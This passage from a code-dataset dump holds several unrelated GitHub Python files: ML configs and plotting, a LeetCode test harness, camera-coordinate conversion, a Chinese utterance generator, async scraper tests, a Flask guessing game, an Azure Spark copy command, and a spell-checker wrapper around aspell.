dnn_model_rmse_seq],\n list_of_colors=[\"b-\", \"r--\"],\n list_of_curve_labels=[\"Linear Model\", \"Deep Neural Network Model\"],\n x_label=\"Iterations of Gradient Descent\",\n y_label=\"Root Mean Square Error\",\n title=\"RMSE across Iterations of Gradient Descent\"\n )\n","repo_name":"TikhonJelvis/RL-book","sub_path":"rl/chapter5/func_approx_simple_examples.py","file_name":"func_approx_simple_examples.py","file_ext":"py","file_size_in_byte":4306,"program_lang":"python","lang":"en","doc_type":"code","stars":410,"dataset":"github-code","pt":"83"} +{"seq_id":"25249679129","text":"_base_ = ['./i3d_r50_dense_32x2x1_50e_ucf101_rgb_ae_edl_dis.py']\n\n# model\nmodel = dict(\n type='YZRecognizer3D',\n backbone=dict(\n type='ResNet3d',\n pretrained2d=True,\n pretrained='torchvision://resnet50',\n depth=50,\n conv1_kernel=(5, 7, 7),\n conv1_stride_t=2,\n pool1_stride_t=2,\n conv_cfg=dict(type='Conv3d'),\n norm_eval=False,\n inflate=((1, 1, 1), (1, 0, 1, 0), (1, 0, 1, 0, 1, 0), (0, 1, 0)),\n zero_init_residual=False),\n cls_head=dict(\n type='AEDebiasHead',\n num_classes=101,\n in_channels=2048,\n loss_cls=dict(\n type='EvidenceLoss',\n num_classes=101,\n evidence='exp',\n loss_type='log',\n with_kldiv=False,\n with_avuloss=False,\n annealing_method='exp',\n total_epochs=50,\n kldiv_weight=1.0,\n avuloss_weight=1.0,\n ),\n loss_recon=dict(\n type='WeightedLoss',\n loss_weight=1.0,\n loss_impl=\"l1\",\n evidence_type=\"exp\",\n num_class=101,\n sign=1.0,\n detach=True,\n per_batch_norm=True,\n recenter=True,\n weight_src=\"unc\",\n ),\n loss_uncnorm=dict(\n type='UncNormLoss',\n loss_weight=1.0,\n evidence_type='exp',\n num_class=101,\n k=1/8,\n sign=1,\n ),\n spatial_type='avg',\n dropout_ratio=0.5,\n init_std=0.01,\n freeze_cls=False,\n freeze_decoder=False,\n with_bn=True,\n recon_grad_rev=True,\n recon_grad_rev_alpha=0.2,\n heavy_cls_head=False,\n do_uncnorm=False,\n loss_debias=dict(type=\"CrossEntropyLoss\", loss_weight=1.0),\n num_scene_classes=365,\n scene_grad_rev_alpha=1.0,\n do_guide=False,\n loss_guide=dict(\n type=\"GuideLoss\",\n loss_weight=1.0,\n loss_impl=\"l1\",\n evidence_type=\"exp\",\n num_class=101,\n detach_unc=False,\n detach_scene=False,\n per_batch_norm=True,\n do_one_minus=True,\n ),\n ),\n recon_tgt='frame_raw',\n do_median_filter=True,\n median_win_size=15,\n # model training and testing settings\n train_cfg=dict(aux_info=['scene_feature', 'scene_pred'], _delete_=True),\n test_cfg=dict(average_clips='evidence', evidence_type='exp'))\n\n# runtime settings\nwork_dir = './work_dirs/i3d_weighed_ae_edl_dis/'\ncustom_hooks = [\n dict(type='AnnealEDLWeightHook', total_epochs=50),\n # dict(type='LinearAnnealGradRevAlphaHook', target=\"weight\")\n]\n","repo_name":"yhZhai/SOAR","sub_path":"configs/recognition/i3d/i3d_r50_dense_32x2x1_50e_ucf101_rgb_weighted_ae_edl_dis.py","file_name":"i3d_r50_dense_32x2x1_50e_ucf101_rgb_weighted_ae_edl_dis.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"37712247302","text":"from L0994_RottingOranges import f_gold\n\n##########\n# ++++++ to be replaced by tester ++++++\nmylog = print\nmyexactlog = print\n\"+++++++++++++++++\"\n\ndef test():\n \"--- test function ---\"\n param = [\n # example 1\n [[[2, 1, 1], [1, 1, 0], [0, 1, 1]]]\n # output: 4\n ,\n # example 2\n [[[2, 1, 1], [0, 1, 1], [1, 0, 1]]]\n # output: -1\n # EXPLANATION: The orange in the bottom left corner (row 2, column 0) is never rotten, because rotting only happens 
4-directionally.\n ,\n # example 3\n [[[0, 2]]]\n # output: 0\n # EXPLANATION: Since there are already no fresh oranges at minute 0, the answer is just 0.\n ,\n ]\n for i, parameters_set in enumerate(param):\n idx = i\n mylog(0, idx)\n result = f_gold(* parameters_set)\n myexactlog(1, result)\n\n##########\n\ntest()\n","repo_name":"HALOCORE/DuoGlot","sub_path":"data/duoglot/tests/staleetcode/pysep/L0994_RottingOranges__test.py","file_name":"L0994_RottingOranges__test.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"83"} +{"seq_id":"19485939867","text":"from typing import Final, Dict\nfrom camconv.typedef import *\nimport numpy as np\n\nk_ref_convention: Final[str] = \"LEFT_UP_FRONT\"\nk_ref_axes: Final[Dict[CubeFace, Tuple[float, float, float]]] = get_reference_axes(k_ref_convention)\n\n\ndef get_transform_to_ref(convention: str) -> np.ndarray:\n '''\n Get the 3x3 matrix mapping from the input convention to the \n reference one.\n '''\n x, y, z = split_axes_convention(convention)\n return np.column_stack((k_ref_axes[x], k_ref_axes[y], k_ref_axes[z]))\n\n\nk_camera_to_ref: Final[Dict[CoordinateSystem, np.ndarray]] = {\n CoordinateSystem.REFERENCE: get_transform_to_ref(k_ref_convention),\n CoordinateSystem.PYTORCH3D: get_transform_to_ref(\"LEFT_UP_FRONT\"),\n CoordinateSystem.COLMAP: get_transform_to_ref(\"RIGHT_DOWN_FRONT\"),\n CoordinateSystem.OPENCV: get_transform_to_ref(\"RIGHT_DOWN_FRONT\"),\n CoordinateSystem.OPENGL: get_transform_to_ref(\"RIGHT_UP_BACK\"),\n CoordinateSystem.NGP: get_transform_to_ref(\"RIGHT_UP_BACK\")\n}\n\nk_world_to_ref: Final[Dict[CoordinateSystem, np.ndarray]] = {\n CoordinateSystem.NGP: get_transform_to_ref(\"FRONT_LEFT_UP\")\n}\n\n\ndef convert_vertices(verts_in: np.ndarray, system_in: CoordinateSystem, system_out: CoordinateSystem) -> np.ndarray:\n '''\n Transform vertices (N x 3) between different coordinate systems\n '''\n t_ref_win = k_world_to_ref.get(system_in, k_camera_to_ref[system_in])\n t_ref_wout = k_world_to_ref.get(system_out, k_camera_to_ref[system_out])\n t_wout_ref = np.linalg.inv(t_ref_wout)\n\n verts_out = np.linalg.multi_dot((t_wout_ref, t_ref_win, verts_in.T)).T\n return verts_out\n\ndef convert_pose(r_in: np.ndarray, t_in: np.ndarray, system_in: CoordinateSystem, system_out: CoordinateSystem) -> Tuple[np.ndarray, np.ndarray]:\n '''\n Convert pose from one coordinate system to another.\n '''\n t_ref_cin = k_camera_to_ref[system_in]\n t_ref_win = k_world_to_ref.get(system_in, t_ref_cin)\n t_cin_ref = np.linalg.inv(t_ref_cin)\n\n t_ref_cout = k_camera_to_ref[system_out]\n t_ref_wout = k_world_to_ref.get(system_out, t_ref_cout)\n t_wout_ref = np.linalg.inv(t_ref_wout)\n\n r_out = np.linalg.multi_dot((t_wout_ref, t_ref_win, r_in, t_cin_ref, t_ref_cout))\n t_out = np.linalg.multi_dot((t_wout_ref, t_ref_win, t_in))\n return r_out, t_out","repo_name":"ankarako/cam-conv","sub_path":"camconv/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"73837843470","text":"import json\nfrom random import *\nfrom weight_choice import *\n\nlabellist={'是':1,'否':2}\n\n#label = 1\n# head = ['', '我看看', '稍等我看看']\nstatus_ture = ['是', '是的','恩', '对', '恩对的','恩是的','恩是','啊是','啊是的','啊对','啊对的','没错','是这','是这个','就是这个','就是这儿']\nmodal_true = ['','','', '啊', '哦','呀']\n\n#label = 2\n# head = ['', '我看看', '稍等我看看']\nmodal_no = ['', '啊', '额']\nstatus_no = 
['不是', '不是的','否','不是这个','不是这儿','不对']\nmodal_no_tail = ['', '','','啊','呀']\n# address_past = ['', '我申请表写的是户口本地址','我申请表写的是身份证地址','我申请表写的是老家地址','我填的是身份证地址','我填的是老家地址','我填的是户口本地址','我申请表填的是身份证地址','我申请表填的是老家地址','我申请表填的是户口本地址']\n\n#label = 2\n# head = ['', '我看看', '稍等我看看']\n# # madal_no = ['', '啊', '额']\n# status_false = ['','不是', '不是的']\n# address_now= ['', '我现在租房子住','我暂时不住那里了','我现在没住在那里','我过一段时间回去住','我改了','我换地方了','我有时候住那','我一段时间住那','我大部分时间不在那里住','我现在在外地打工','我在别的地方工作','我换工作了就不住那里了','我马上搬家了','我不住那里了','我现在不住那里了']\n# modal_false = ['','啊','呀']\n\nclass Confirm(object):\n def __init__(self):\n self.items_list = str()\n self.items_choice = str()\n\n def update(self, iterable):\n self.items_list = ''.join(iterable)\n return self.items_list\n\n def choosesingle(self, iterable):\n self.items_choice =''.join(choice(iterable))\n return self.items_choice\n\n def choose(self, iterable):\n for item in iterable:\n self.items_choice = self.items_choice + choice(item)\n return self.items_choice\n\n\ndef confirm_yes():\n confirm = Confirm()\n label = 1\n confirm_true = confirm.choose([status_ture,modal_true])\n return confirm_true,label\n\n# def confirm_false():\n# confirm = Confirm()\n# label = 2\n# confirm_no = confirm.choose([head,modal_no,status_false,address_now,modal_false])\n# return confirm_no,label\n\ndef confirm_no():\n confirm = Confirm()\n label = 2\n confirm_no = confirm.choose([modal_no,status_no,modal_no_tail])\n return confirm_no,label\n\n# print(confirm_yes())\n# print(confirm_no())\n# print(confirm_false())\ndef gen_confirm():\n confirm_list =[confirm_yes(), confirm_no()]\n confirm_ref, label_name = choice(confirm_list)\n return confirm_ref, label_name\n\n# print(len(address_past),len(address_now))\n\nif __name__ == \"__main__\":\n num_data = 1000\n list_data = list()\n label_name = 'confirm'\n for i in range(num_data):\n list_dict = dict()\n list_dict['label_name'] = label_name\n list_dict['id'] = i\n list_dict['ref'], list_dict['label'] = gen_confirm()\n list_data.append(list_dict)\n print('loading')\n # print(list_data)\n obj = json.dumps(list_data, ensure_ascii=False, indent=2)\n file = open('/home/yzs/gendata/'+label_name+'_gen_0605_'+str(num_data)+'.json', 'w')\n file.write(obj)\n file.close()","repo_name":"yanzhishuo/dataprocessing_dc","sub_path":"genconfirm/confirm_simple.py","file_name":"confirm_simple.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"29241897367","text":"from typing import Optional, Tuple, Iterable\n\nimport pytest\n\nfrom aioscrapy.client import FakeClient, CrawlerClient\nfrom aioscrapy.worker import Dispatcher, SimpleWorker, CrawlerWorker, Master\n\n\nclass ReduceStringClient(CrawlerClient[str, str]):\n async def fetch(self, key: str) -> Optional[Tuple[Iterable[str], str]]:\n if key:\n return [key[:-1]], key\n return None\n\n\n@pytest.mark.asyncio\nasync def test_reduce_string_client():\n client = ReduceStringClient()\n assert await client.fetch('123') == (['12'], '123')\n assert await client.fetch('1') == ([''], '1')\n assert await client.fetch('') is None\n\n\ndef test_dispatcher():\n dispatcher = Dispatcher([])\n assert dispatcher.empty() is True\n key1, key2, key3, error_key = 'key1', 'key2', 'key3', 'error_key'\n\n dispatcher.add(key1)\n assert dispatcher.empty() is False\n\n key = dispatcher.get()\n assert key == key1\n dispatcher.ack(key)\n assert dispatcher.empty() is True\n\n dispatcher.add(key2)\n dispatcher.add(key3)\n\n keys = {dispatcher.get(), 
dispatcher.get()}\n    assert keys == {key2, key3}\n    assert dispatcher.empty() is False\n    dispatcher.ack(error_key)\n    dispatcher.ack(key2)\n    assert dispatcher.empty() is False\n    dispatcher.ack(key3)\n    assert dispatcher.empty() is True\n\n\n@pytest.mark.asyncio\nasync def test_simple_worker():\n    keys = ['key1', 'key2', 'key3']\n    dispatcher = Dispatcher(keys)\n    client = FakeClient()\n    worker = SimpleWorker(dispatcher, client)\n    result = await worker.run()\n    assert result == {key: key for key in keys}\n\n\n@pytest.mark.asyncio\nasync def test_crawler_worker():\n    keys = ['abc', 'asd']\n    dispatcher = Dispatcher(keys)\n    client = ReduceStringClient()\n    worker = CrawlerWorker(dispatcher, client)\n    result = await worker.run()\n    assert result == {\n        'a': 'a',\n        'ab': 'ab',\n        'abc': 'abc',\n        'as': 'as',\n        'asd': 'asd',\n    }\n\n\n@pytest.mark.asyncio\nasync def test_master():\n    keys = ['key1', 'key2', 'key3']\n    dispatcher = Dispatcher(keys)\n    client = FakeClient()\n    worker1 = SimpleWorker(dispatcher, client)\n    worker2 = SimpleWorker(dispatcher, client)\n    master = Master((worker1, worker2))\n    result = await master.run()\n    assert result == {key: key for key in keys}\n","repo_name":"aleksender/aioscrapy","sub_path":"tests/test_worker.py","file_name":"test_worker.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"}
{"seq_id":"3084875451","text":"import os\r\nfrom typing import (\r\n    Final\r\n)\r\nfrom flask import (\r\n    Flask,\r\n    render_template,\r\n    session,\r\n    request,\r\n    redirect,\r\n    url_for,\r\n)\r\nfrom scripts.utils import (\r\n    IMAGE_PATH,\r\n    get_dependencies,\r\n    get_predicted_label,\r\n    generate_options,\r\n)\r\nimport cv2\r\nimport random\r\n\r\n\r\n# Constants\r\nPORT_NUMBER: Final = 5000\r\nWIDTH_HEIGHT: Final = 300\r\n\r\n\r\napp = Flask(__name__)\r\napp.secret_key = \"secret-key\"\r\n\r\n\r\ndef init_session():\r\n    \"\"\"\r\n    Initializes the session variables. It sets the score to 0, the count to 0 \r\n    and shuffles and resizes the files.\r\n    @effects: Modifies the `session`.\r\n    \"\"\"\r\n    # The user accessed the play page directly\r\n    if \"initialized\" not in session:\r\n        return\r\n\r\n    # The session has already been initialized\r\n    if session[\"initialized\"]:\r\n        return\r\n\r\n    session[\"score\"] = 0\r\n    session[\"count\"] = 0\r\n\r\n    session[\"files\"] = os.listdir(IMAGE_PATH)\r\n    random.shuffle(session[\"files\"])\r\n\r\n    # Resize all the images to 300x300 if they aren't already\r\n    for filename in session[\"files\"]:\r\n        img = cv2.imread(f\"{IMAGE_PATH}/{filename}\", cv2.IMREAD_UNCHANGED)\r\n        height, width, _ = img.shape\r\n        if height == width == WIDTH_HEIGHT:\r\n            continue\r\n        img = cv2.resize(img, (WIDTH_HEIGHT, WIDTH_HEIGHT))\r\n        cv2.imwrite(f\"{IMAGE_PATH}/{filename}\", img)\r\n    \r\n    session[\"initialized\"] = True\r\n\r\n\r\ndef get_file() -> str:\r\n    \"\"\"\r\n    Gets the next file in the list of files.\r\n    \"\"\"\r\n    files = session[\"files\"]\r\n    return files[session[\"count\"] % len(files)]\r\n\r\n\r\n@app.route(\"/\")\r\ndef index():\r\n    session[\"initialized\"] = False\r\n    return render_template(\"index.html\")\r\n\r\n\r\n@app.route(\"/play\", methods=[\"GET\", \"POST\"])\r\ndef play():\r\n    # User accessed the page directly without going through the main page\r\n    if \"initialized\" not in session:\r\n        return redirect(url_for(\"index\"))\r\n    if request.method == \"POST\":\r\n        option = request.form[\"option\"]\r\n        predicted_label = session[\"predicted_label\"]\r\n\r\n        if option == predicted_label:\r\n            session[\"score\"] += 1\r\n\r\n        session[\"count\"] += 1\r\n\r\n        session[\"current_score\"] = session[\"score\"]\r\n        session[\"current_count\"] = session[\"count\"]\r\n\r\n        return render_template(\r\n            \"result.html\",\r\n            predicted_label=predicted_label,\r\n            option=option,\r\n            score=session[\"score\"],\r\n            count=session[\"count\"],\r\n            num_files=len(session[\"files\"]),\r\n        )\r\n    elif \"count\" in session and session[\"count\"] >= len(session[\"files\"]):\r\n        return redirect(url_for(\"done\"))\r\n\r\n    # User navigated to the page so we want to display the image and options\r\n    else:\r\n        init_session()\r\n        \r\n        label_dict, best_model = get_dependencies()\r\n        filename = get_file()\r\n        predicted_label = get_predicted_label(filename, best_model, label_dict)\r\n        session[\"predicted_label\"] = predicted_label\r\n\r\n        return render_template(\r\n            \"options.html\",\r\n            options=generate_options(predicted_label, label_dict),\r\n            image_path=f\"{IMAGE_PATH}/{filename}\"\r\n        )\r\n\r\n\r\n@app.route(\"/done\")\r\ndef done():\r\n    # User accessed the page directly without playing the game\r\n    if \"initialized\" not in session or \"current_score\" not in session \\\r\n        or \"current_count\" not in session:\r\n        return redirect(url_for(\"index\"))\r\n    \r\n    score = session[\"current_score\"]\r\n    count = session[\"current_count\"]\r\n    session[\"initialized\"] = False\r\n    init_session()\r\n\r\n    return render_template(\r\n        \"done.html\",\r\n        score=score,\r\n        count=count,\r\n    )\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    app.run(debug=True, port=PORT_NUMBER)\r\n","repo_name":"christopherlam888/produce-palate","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3781,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"}
{"seq_id":"22060942456","text":"import argparse\nimport sys\nimport typing\n\nimport aztk.spark\nfrom aztk_cli import config, utils\n\n\ndef setup_parser(parser: 
argparse.ArgumentParser):\n parser.add_argument(\"--id\", dest=\"cluster_id\", required=True, help=\"The unique id of your spark cluster\")\n\n parser.add_argument(\"--source-path\", required=True, help=\"the local file you wish to copy to the cluster\")\n\n parser.add_argument(\n \"--dest-path\",\n required=True,\n help=\"the path the file will be copied to on each node in the cluster.\"\n \"Note that this must include the file name.\",\n )\n parser.add_argument(\n \"--internal\",\n action=\"store_true\",\n help=\"Connect using the local IP of the master node. Only use if using a VPN.\",\n )\n parser.set_defaults(internal=False)\n\n\ndef execute(args: typing.NamedTuple):\n spark_client = aztk.spark.Client(config.load_aztk_secrets())\n with utils.Spinner():\n copy_output = spark_client.cluster.copy(\n id=args.cluster_id, source_path=args.source_path, destination_path=args.dest_path, internal=args.internal)\n for node_output in copy_output:\n utils.log_node_copy_output(node_output)\n sys.exit(0 if not any([node_output.error for node_output in copy_output]) else 1)\n","repo_name":"Azure/aztk","sub_path":"aztk_cli/spark/endpoints/cluster/cluster_copy.py","file_name":"cluster_copy.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":152,"dataset":"github-code","pt":"83"} +{"seq_id":"26754422011","text":"\"\"\"Spell check with Aspell or Hunspell.\"\"\"\nimport os\nimport importlib\nfrom . import util\nfrom .__meta__ import __version__, __version_info__ # noqa: F401\nfrom . import flow_control\nfrom . import filters\nfrom wcmatch import glob\nimport codecs\nfrom collections import namedtuple\n\n__all__ = (\"spellcheck\",)\n\nSTEP_ERROR = \"\"\"Pipeline step in unexpected format: {}\n\nEach pipeline step should be in the form {{key: options: {{}}}} not {{key: {{}}, key2: {{}}}}\n\"\"\"\n\n\nclass Results(namedtuple('Results', ['words', 'context', 'category', 'error'])):\n \"\"\"Results.\"\"\"\n\n def __new__(cls, words, context, category, error=None):\n \"\"\"Allow defaults.\"\"\"\n\n return super().__new__(cls, words, context, category, error)\n\n\nclass SpellChecker:\n \"\"\"Spell check class.\"\"\"\n\n DICTIONARY = 'dictionary.dic'\n\n GLOB_FLAG_MAP = {\n \"CASE\": glob.C,\n \"C\": glob.C,\n \"IGNORECASE\": glob.I,\n \"I\": glob.I,\n \"RAWCHARS\": glob.R,\n \"R\": glob.R,\n \"NEGATE\": glob.N,\n \"N\": glob.N,\n \"MINUSNEGATE\": glob.M,\n \"M\": glob.M,\n \"GLOBSTAR\": glob.G,\n \"G\": glob.G,\n \"DOTGLOB\": glob.D,\n \"D\": glob.D,\n \"EXTGLOB\": glob.E,\n \"E\": glob.E,\n \"BRACE\": glob.B,\n \"B\": glob.B,\n \"FOLLOW\": glob.L,\n \"L\": glob.L,\n \"MATCHBASE\": glob.X,\n \"X\": glob.X,\n \"NEGATEALL\": glob.A,\n \"A\": glob.A,\n \"NOUNIQUE\": glob.Q,\n \"Q\": glob.Q,\n \"GLOBTILDE\": glob.T,\n \"T\": glob.T,\n # We will accept these, but we already force them on\n \"SPLIT\": glob.S,\n \"S\": glob.S,\n \"NODIR\": glob.O,\n \"O\": glob.O\n }\n\n def __init__(self, config, binary='', verbose=0, debug=False):\n \"\"\"Initialize.\"\"\"\n\n # General options\n self.binary = binary if binary else 'aspell'\n self.verbose = verbose\n self.dict_bin = os.path.abspath(self.DICTIONARY)\n self.debug = debug\n self.default_encoding = ''\n\n def log(self, text, level):\n \"\"\"Log level.\"\"\"\n if self.verbose >= level:\n print(text)\n\n def get_error(self, e):\n \"\"\"Get the error.\"\"\"\n\n import traceback\n\n return traceback.format_exc() if self.debug else str(e)\n\n def setup_command(self, encoding, options, personal_dict, file_name=None):\n 
\"\"\"Setup the command.\"\"\"\n\n return []\n\n def _pipeline_step(self, sources, options, personal_dict, filter_index=1, flow_status=flow_control.ALLOW):\n \"\"\"Recursively run text objects through the pipeline steps.\"\"\"\n\n for source in sources:\n if source._has_error():\n yield source\n elif not source._is_bytes() and filter_index < len(self.pipeline_steps):\n f = self.pipeline_steps[filter_index]\n if isinstance(f, flow_control.FlowControl):\n err = ''\n try:\n status = f._run(source.category)\n except Exception as e:\n err = self.get_error(e)\n yield filters.SourceText('', source.context, '', '', err)\n if not err:\n if filter_index < len(self.pipeline_steps):\n yield from self._pipeline_step(\n [source], options, personal_dict, filter_index + 1, status\n )\n else:\n if flow_status == flow_control.ALLOW:\n err = ''\n try:\n srcs = f._run(source)\n except Exception as e:\n err = self.get_error(e)\n yield filters.SourceText('', source.context, '', '', err)\n if not err:\n yield from self._pipeline_step(\n srcs, options, personal_dict, filter_index + 1\n )\n elif flow_status == flow_control.SKIP:\n yield from self._pipeline_step(\n [source], options, personal_dict, filter_index + 1\n )\n else:\n # Halted tasks\n yield source\n else:\n # Binary content\n yield source\n\n def _spelling_pipeline(self, sources, options, personal_dict):\n \"\"\"Check spelling pipeline.\"\"\"\n\n for source in self._pipeline_step(sources, options, personal_dict):\n # Don't waste time on empty strings\n if source._has_error():\n yield Results([], source.context, source.category, source.error)\n elif not source.text or source.text.isspace():\n continue\n else:\n encoding = source.encoding\n if source._is_bytes():\n text = source.text\n else:\n # UTF-16 and UTF-32 don't work well with Aspell and Hunspell,\n # so encode with the compatible UTF-8 instead.\n if encoding.startswith(('utf-16', 'utf-32')):\n encoding = 'utf-8'\n text = source.text.encode(encoding)\n self.log('', 3)\n self.log(text, 3)\n cmd = self.setup_command(encoding, options, personal_dict)\n self.log(\"Command: \" + str(cmd), 4)\n\n try:\n wordlist = util.call_spellchecker(cmd, input_text=text, encoding=encoding)\n yield Results(\n [w for w in sorted(set(wordlist.replace('\\r', '').split('\\n'))) if w],\n source.context,\n source.category\n )\n except Exception as e: # pragma: no cover\n err = self.get_error(e)\n yield Results([], source.context, source.category, err)\n\n def spell_check_no_pipeline(self, sources, options, personal_dict):\n \"\"\"Spell check without the pipeline.\"\"\"\n\n def compile_dictionary(self, lang, wordlists, output):\n \"\"\"Compile user dictionary.\"\"\"\n\n def _walk_src(self, targets, flags, limit, pipeline, expect_match):\n \"\"\"Walk source and parse files.\"\"\"\n\n found_something = False\n for target in targets:\n # Glob using `S` for patterns with `|` and `O` to exclude directories.\n kwargs = {\"flags\": flags | glob.S | glob.O}\n kwargs['limit'] = limit\n for f in glob.iglob(target, **kwargs):\n found_something = True\n self.log('', 2)\n self.log('> Processing: %s' % f, 1)\n if pipeline:\n try:\n yield pipeline[0]._run_first(f)\n except Exception as e:\n err = self.get_error(e)\n yield [filters.SourceText('', f, '', '', err)]\n else:\n try:\n if self.default_encoding:\n encoding = filters.PYTHON_ENCODING_NAMES.get(\n self.default_encoding, self.default_encoding\n ).lower()\n encoding = codecs.lookup(encoding).name\n else:\n encoding = self.default_encoding\n yield [filters.SourceText('', f, encoding, 
'file')]\n except Exception as e:\n err = self.get_error(e)\n yield [filters.SourceText('', f, '', '', err)]\n if not found_something and expect_match:\n raise RuntimeError(\n 'None of the source targets from the configuration match any files:\\n{}'.format(\n '\\n'.join(f'- {target}' for target in targets)\n )\n )\n\n def setup_spellchecker(self, task):\n \"\"\"Setup spell checker.\"\"\"\n\n return {}\n\n def setup_dictionary(self, task):\n \"\"\"Setup dictionary.\"\"\"\n\n return None\n\n def _build_pipeline(self, task):\n \"\"\"Build up the pipeline.\"\"\"\n\n self.pipeline_steps = []\n kwargs = {}\n if self.default_encoding:\n kwargs[\"default_encoding\"] = self.default_encoding\n\n steps = task.get('pipeline', [])\n if steps is None:\n self.pipeline_steps = None\n else:\n if not steps:\n steps = task.get('filters', [])\n if steps:\n util.warn_deprecated(\n \"'filters' key in config is deprecated. 'pipeline' should be used going forward.\"\n )\n\n if not steps:\n steps.append('pyspelling.filters.text')\n\n for step in steps:\n # Retrieve module and module options\n if isinstance(step, dict):\n if len(step) > 1:\n raise ValueError(STEP_ERROR.format(str(step)))\n name, options = next(iter(step.items()))\n else:\n name = step\n options = {}\n if options is None:\n options = {}\n\n module = self._get_module(name)\n if issubclass(module, filters.Filter):\n self.pipeline_steps.append(module(options, **kwargs))\n elif issubclass(module, flow_control.FlowControl):\n if self.pipeline_steps:\n self.pipeline_steps.append(module(options))\n else:\n raise ValueError(\"Pipeline cannot start with a 'Flow Control' plugin!\")\n else:\n raise ValueError(\"'%s' is not a valid plugin!\" % name)\n\n def _get_module(self, module):\n \"\"\"Get module.\"\"\"\n\n if isinstance(module, str):\n mod = importlib.import_module(module)\n for name in ('get_plugin', 'get_filter'):\n attr = getattr(mod, name, None)\n if attr is not None:\n break\n if name == 'get_filter':\n util.warn_deprecated(\"'get_filter' is deprecated. Plugins should use 'get_plugin'.\")\n if not attr:\n raise ValueError(\"Could not find the 'get_plugin' function in module '%s'!\" % module)\n return attr()\n\n def _to_flags(self, text):\n \"\"\"Convert text representation of flags to actual flags.\"\"\"\n\n flags = 0\n for x in text.split('|'):\n value = x.strip().upper()\n if value:\n flags |= self.GLOB_FLAG_MAP.get(value, 0)\n return flags\n\n def run_task(self, task, source_patterns=None):\n \"\"\"Walk source and initiate spell check.\"\"\"\n\n # Perform spell check\n self.log('Running Task: %s...' 
% task.get('name', ''), 1)\n\n # Setup filters and variables for the spell check\n self.default_encoding = task.get('default_encoding', '')\n options = self.setup_spellchecker(task)\n personal_dict = self.setup_dictionary(task)\n glob_flags = self._to_flags(task.get('glob_flags', \"N|B|G\"))\n glob_limit = task.get('glob_pattern_limit', 1000)\n self._build_pipeline(task)\n\n if not source_patterns:\n source_patterns = task.get('sources', [])\n\n expect_match = task.get('expect_match', True)\n for sources in self._walk_src(source_patterns, glob_flags, glob_limit, self.pipeline_steps, expect_match):\n if self.pipeline_steps is not None:\n yield from self._spelling_pipeline(sources, options, personal_dict)\n else:\n yield from self.spell_check_no_pipeline(sources, options, personal_dict)\n\n\nclass Aspell(SpellChecker):\n \"\"\"Aspell spell check class.\"\"\"\n\n def __init__(self, config, binary='', verbose=0, debug=False):\n \"\"\"Initialize.\"\"\"\n\n super().__init__(config, binary, verbose, debug)\n self.binary = binary if binary else 'aspell'\n\n def setup_spellchecker(self, task):\n \"\"\"Setup spell checker.\"\"\"\n\n return task.get('aspell', {})\n\n def setup_dictionary(self, task):\n \"\"\"Setup dictionary.\"\"\"\n\n dictionary_options = task.get('dictionary', {})\n output = os.path.abspath(dictionary_options.get('output', self.dict_bin))\n aspell_options = task.get('aspell', {})\n lang = aspell_options.get('lang', aspell_options.get('l', 'en'))\n wordlists = dictionary_options.get('wordlists', [])\n if lang and wordlists:\n self.compile_dictionary(\n lang,\n dictionary_options.get('wordlists', []),\n dictionary_options.get('encoding', 'utf-8'),\n output\n )\n else:\n output = None\n return output\n\n def compile_dictionary(self, lang, wordlists, encoding, output):\n \"\"\"Compile user dictionary.\"\"\"\n\n cmd = [\n self.binary,\n '--lang', lang,\n '--encoding', codecs.lookup(filters.PYTHON_ENCODING_NAMES.get(encoding, encoding).lower()).name,\n 'create',\n 'master', output\n ]\n\n wordlist = ''\n\n try:\n output_location = os.path.dirname(output)\n if not os.path.exists(output_location):\n os.makedirs(output_location)\n if os.path.exists(output):\n os.remove(output)\n\n self.log(\"Compiling Dictionary...\", 1)\n # Read word lists and create a unique set of words\n words = set()\n for wordlist in wordlists:\n with open(wordlist, 'rb') as src:\n for word in src.read().split(b'\\n'):\n words.add(word.replace(b'\\r', b''))\n\n # Compile wordlist against language\n util.call(\n cmd,\n input_text=b'\\n'.join(sorted(words)) + b'\\n'\n )\n except Exception:\n self.log(cmd, 0)\n self.log(\"Current wordlist: '%s'\" % wordlist, 0)\n self.log(\"Problem compiling dictionary. 
Check the binary path and options.\", 0)\n raise\n\n def spell_check_no_pipeline(self, sources, options, personal_dict):\n \"\"\"Spell check without the pipeline.\"\"\"\n\n for source in sources:\n\n if source._has_error(): # pragma: no cover\n yield Results([], source.context, source.category, source.error)\n\n try:\n with open(source.context, 'rb') as f:\n content = f.read()\n except Exception as e: # pragma: no cover\n err = self.get_error(e)\n yield Results([], source.context, source.category, err)\n\n # Don't waste time on empty string\n if not content or content.isspace():\n continue\n\n self.log('', 3)\n self.log(content, 3)\n\n cmd = self.setup_command(source.encoding, options, personal_dict, source.context)\n self.log(\"Command: \" + str(cmd), 4)\n try:\n wordlist = util.call_spellchecker(cmd, input_text=content, encoding=source.encoding)\n yield Results(\n [w for w in sorted(set(wordlist.replace('\\r', '').split('\\n'))) if w],\n source.context,\n source.category\n )\n except Exception as e: # pragma: no cover\n err = self.get_error(e)\n yield Results([], source.context, source.category, err)\n\n def setup_command(self, encoding, options, personal_dict, file_name=None):\n \"\"\"Setup the command.\"\"\"\n\n cmd = [\n self.binary,\n 'list'\n ]\n\n if encoding:\n cmd.extend(['--encoding', encoding])\n\n if personal_dict:\n cmd.extend(['--add-extra-dicts', personal_dict])\n\n disallowed = {\n '?', 'a', 'c', 'v', 'ignore-repl', 'dont-ignore-repl', 'keyboard', 'prefix', 'repl', 'save-repl',\n 'dont-save-repl', 'set-prefix', 'dont-set-prefix', 'size', 'sug-mode', 'sug-typo-analysis',\n 